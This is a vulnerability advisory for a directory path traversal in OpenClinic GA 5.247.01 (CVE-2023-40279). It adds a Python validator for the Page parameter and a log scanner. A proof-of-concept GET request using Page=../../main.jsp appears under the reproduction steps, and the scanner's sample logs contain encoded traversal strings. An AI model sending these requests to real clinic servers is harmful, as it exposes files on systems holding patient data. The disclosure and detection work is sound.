CVE-2023-40279_Authenticated-Directory-Path-Traversal_OpenClinic-GA_5.247.01_Report.md

File metadata and controls

46 lines (33 loc) · 2.54 KB

CVE-2023-40279: Authenticated Directory Path Traversal via main.do in OpenClinic GA 5.247.01

Abstract

A Directory Path Traversal vulnerability has been discovered in OpenClinic GA version 5.247.01, affecting the main.do component. This vulnerability enables authenticated attackers to traverse the server's directory structure via the Page parameter in a GET request, allowing for the unauthorized retrieval and execution of files from arbitrary directories.

Identification

CVE ID: CVE-2023-40279

Exploit Title: Authenticated Directory Path Traversal via main.do in OpenClinic GA 5.247.01

Date Discovered: 2023-08-14

Affected Software: OpenClinic GA version 5.247.01

Vendor: OpenClinic

Software Link: SourceForge Project Page

Tested Environments: Windows 10, Windows 11

Vulnerability Details

The vulnerability resides in the handling of the Page parameter within the main.do request. Improper validation of this parameter allows authenticated users to construct a GET request that can traverse directories and access or execute files outside the application's intended directories, posing a significant security risk.
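The validation the advisory says main.do lacks can be made concrete. The following is an added example written for this report, not code from OpenClinic GA: it decodes a Page value once, rejects dot segments, separators and file types that are not part of a plain page name, and finally checks that the canonical path still lies under the page root. The root directory, the `.jsp` allow-list and the `resolve_page` / `is_safe` names are assumptions chosen for illustration.

```python
"""Hardened resolution of a page-name parameter before it is dispatched.

Added example: this is not OpenClinic GA code. It shows the validation the
advisory says main.do lacks for its Page parameter.
"""
from pathlib import Path, PurePosixPath
from urllib.parse import unquote
import re

# Assumed page root (constructed path, not taken from the project).
PAGE_ROOT = Path("/var/lib/openclinic/pages")
ALLOWED_SUFFIXES = {".jsp"}
# One directory or file-name segment: letters, digits, underscore, hyphen only.
SAFE_SEGMENT = re.compile(r"^[A-Za-z0-9_-]+$")


class PageRejected(ValueError):
    """Raised when the Page value must not be dispatched."""


def resolve_page(page: str, root: Path = PAGE_ROOT) -> Path:
    """Return the canonical file for `page`, or raise PageRejected."""
    decoded = unquote(page)  # decode exactly once, as the container would
    if "\x00" in decoded or "\\" in decoded:
        # NUL truncation and Windows separators (the advisory's test hosts
        # were Windows 10/11) are never part of a legitimate page name.
        raise PageRejected("illegal character in Page")
    rel = PurePosixPath(decoded)
    if rel.is_absolute() or not rel.parts:
        raise PageRejected("absolute or empty Page")
    if any(part in (".", "..") for part in rel.parts):
        raise PageRejected("dot segment in Page")
    if rel.suffix not in ALLOWED_SUFFIXES:
        raise PageRejected("disallowed file type")
    # Every directory segment and the file stem must be a plain name; this
    # also rejects leftover percent signs from double-encoded input.
    segments = list(rel.parts[:-1]) + [rel.stem]
    if not all(SAFE_SEGMENT.match(seg) for seg in segments):
        raise PageRejected("unexpected characters in Page")
    # Canonicalise and require the page root as an ancestor, so a symlink
    # inside the root cannot point back outside it.
    root_real = root.resolve()
    candidate = (root_real / rel).resolve()
    if root_real not in candidate.parents:
        raise PageRejected("resolved outside page root")
    return candidate


def is_safe(page: str, root: Path = PAGE_ROOT) -> bool:
    """Convenience wrapper: True when resolve_page would dispatch the value."""
    try:
        resolve_page(page, root)
        return True
    except PageRejected:
        return False


if __name__ == "__main__":
    for sample in ("home.jsp", "reports/daily.jsp", "../../main.jsp",
                   "..%2f..%2fmain.jsp", "/etc/passwd", "home.jsp%00.png"):
        print(f"{sample!r:24} -> {'allowed' if is_safe(sample) else 'rejected'}")
```

The segment allow-list does most of the work; the final ancestor check is kept because it also catches symlinks and any encoding the earlier rules did not anticipate, which is the property a reviewer should verify rather than the list of rejected patterns.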

Proof of Concept (PoC)

Steps to Reproduce:

1. Crafting the Malicious GET Request:
  Use a web browser or an HTTP request tool such as curl or Burp Suite.
  Construct the GET request as below, using ../../main.jsp to navigate directories and access main.jsp:
    GET /openclinic/main.do?Page=../../main.jsp HTTP/1.1
    Host: 192.168.100.5:10088
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en-US;q=0.9,en;q=0.8
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36
    Connection: close
    Cookie: JSESSIONID=[SESSION ID]
    Cache-Control: max-age=0

  Replace [SESSION ID] with a valid session ID from an authenticated user session.

2. Confirming the Vulnerability:
  Send the crafted GET request to the server.
  If the server responds by providing the content of main.jsp or any file outside the intended directory, it confirms the existence of a directory path traversal vulnerability. This access could lead to the disclosure of sensitive information or facilitate more severe attacks.
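For teams that cannot patch immediately, the same request pattern is easy to spot in web server logs. The following is an added detection example, not part of the advisory: it parses combined-format access-log lines, decodes the Page query parameter once and flags any main.do request whose value escapes its directory, noting whether the server answered 200 (the file was actually served). The log lines are constructed for this example; the client addresses, timestamps and user agents are placeholders, and the traversal value is the one the advisory reports plus a percent-encoded form of it.

```python
"""Detection: flag main.do requests whose Page parameter escapes its directory.

Added example, not part of the advisory. Runs over constructed access-log
lines in combined format.
"""
import re
from urllib.parse import urlsplit, parse_qs

LOG_LINE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Constructed sample lines; addresses, times and agents are placeholders.
SAMPLE_LOG = """\
192.168.100.20 - - [14/Aug/2023:09:58:41 +0000] "GET /openclinic/main.do?Page=home.jsp HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.168.100.20 - - [14/Aug/2023:10:01:09 +0000] "GET /openclinic/main.do?Page=../../main.jsp HTTP/1.1" 200 8840 "-" "Mozilla/5.0"
192.168.100.21 - - [14/Aug/2023:10:02:15 +0000] "GET /openclinic/main.do?Page=..%2F..%2Fmain.jsp HTTP/1.1" 200 8840 "-" "curl/8.0.1"
192.168.100.22 - - [14/Aug/2023:10:03:40 +0000] "GET /openclinic/main.do?Page=reports/daily.jsp HTTP/1.1" 200 3300 "-" "Mozilla/5.0"
192.168.100.23 - - [14/Aug/2023:10:04:02 +0000] "GET /openclinic/images/logo.png HTTP/1.1" 304 0 "-" "Mozilla/5.0"
"""


def traverses(page: str) -> bool:
    """True if a decoded Page value is absolute or contains a dot-dot segment."""
    normalised = page.replace("\\", "/")  # Windows hosts accept either separator
    if normalised.startswith("/"):
        return True
    return ".." in normalised.split("/")


def scan_log(text: str) -> list[dict]:
    """Return one finding per main.do request whose Page value traverses."""
    findings = []
    for line in text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        parts = urlsplit(m["target"])
        if not parts.path.endswith("/main.do"):
            continue
        # parse_qs percent-decodes once, mirroring what the servlet sees.
        for page in parse_qs(parts.query, keep_blank_values=True).get("Page", []):
            if traverses(page):
                findings.append({
                    "client": m["client"],
                    "time": m["time"],
                    "page": page,
                    "status": int(m["status"]),
                    # 200 means the server served the requested file.
                    "served": m["status"] == "200",
                })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['time']} {f['client']} Page={f['page']!r} status={f['status']}")
```

Because the check runs on the decoded value, the plain and percent-encoded requests produce the same finding; correlating the client address with the JSESSIONID from the application's own logs then identifies which authenticated account issued them.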

Impact

By exploiting this vulnerability, attackers could potentially access sensitive system files or execute unauthorized actions on the server, leading to data breaches, system compromise, and a significant breach of security protocols.